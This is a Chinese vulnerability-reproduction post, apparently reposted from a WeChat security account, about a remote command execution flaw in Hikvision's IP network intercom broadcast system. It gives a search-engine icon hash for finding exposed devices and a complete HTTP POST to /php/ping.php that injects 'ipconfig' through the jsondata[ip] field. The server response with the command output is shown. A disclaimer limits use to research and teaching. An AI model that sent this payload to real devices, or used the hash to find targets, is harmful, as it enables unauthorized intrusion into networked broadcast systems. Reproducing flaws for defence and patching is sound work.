资产收集
web.icon==
"e854b2eaa9e4685a95d8052d5e3165bc"
漏洞复现
构造请求包,向靶场发送如下数据包执行ipconfig命令
POST
/php/ping.php
HTTP/1.1
Host
: x.x.x.x
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length
: 51
Accept
: application/json, text/javascript, */*; q=0.01
Accept-Encoding
: gzip, deflate
Accept-Language
: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection
: close
Content-Type
: application/x-www-form-urlencoded
X-Requested-With
: XMLHttpRequest
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
响应内容
HTTP/1.1
200
OK
Server
: nginx/1.18.0
Date
: Tue, 02 Jan 2024 07:47:56 GMT
Content-Type
: text/html; charset=utf-8
Connection
: close
X-Powered-By
: PHP/7.4.7
Access-Control-Allow-Origin
: *
Access-Control-Allow-Headers
: X-Requested-With
Access-Control-Allow-Methods
: GET,POST,OPTIONS
Content-Length
: 463
[
""
,
"Windows IP u914du7f6e"
,
""
,
""
,
"u4ee5u592au7f51u9002u914du5668 u4ee5u592au7f51:"
,
""
,
" u8fdeu63a5u7279u5b9au7684 DNS u540eu7f00 . . . . . . . :"
,
" u672cu5730u94feu63a5 IPv6 u5730u5740. . . . . . . . : fe80::6d38:2c60:9aa6:1142%2"
,
" IPv4 u5730u5740 . . . . . . . . . . . . : 172.17.32.14"
,
" u5b50u7f51u63a9u7801 . . . . . . . . . . . . : 255.255.240.0"
,
" u9ed8u8ba4u7f51u5173. . . . . . . . . . . . . : 172.17.32.1"
]
原文始发于微信公众号(Devil安全):【漏洞复现】海康威视IP网络对讲广播系统远程命令执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论